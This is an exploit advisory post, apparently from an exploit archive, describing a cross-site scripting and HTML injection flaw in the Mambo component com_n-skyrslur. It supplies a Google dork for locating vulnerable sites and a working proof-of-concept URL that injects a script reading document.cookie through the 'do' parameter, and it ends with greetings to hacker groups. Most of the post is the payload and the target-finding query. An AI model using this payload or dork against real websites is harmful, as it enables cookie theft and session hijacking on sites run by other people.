Home / exploits Mambo N-Skyrslur Cross Site Scripting
Posted on 02 September 2011
------------------------------------------------------------------------------------------------------------------------------- # Exploit Title: Mambo Component com_n-skyrslur XSS & HTML Injection Vulnerability # Google Dork: inurl:index.php?option=com_n-skyrslur # Date: 01/09/2011 # Author: CoBRa_21 (Penetration Tester) # E-Mail: ghost1lover@hotmail.com # Software Link: http://www.netvistun.is/ # Tested on: FreeBSD 6.1 (remote host) ------------------------------------------------------------------------------------------------------------------------------- Exploit http://localhost/[PATH]/index.php?option=com_n-skyrslur&Itemid=51&do=<script>alert(document.cookie)</script> ------------------------------------------------------------------------------------------------------------------------------- Thanks E-Banka.Org & Cyber-Warrior.Org -------------------------------------------------------------------------------------------------------------------------------
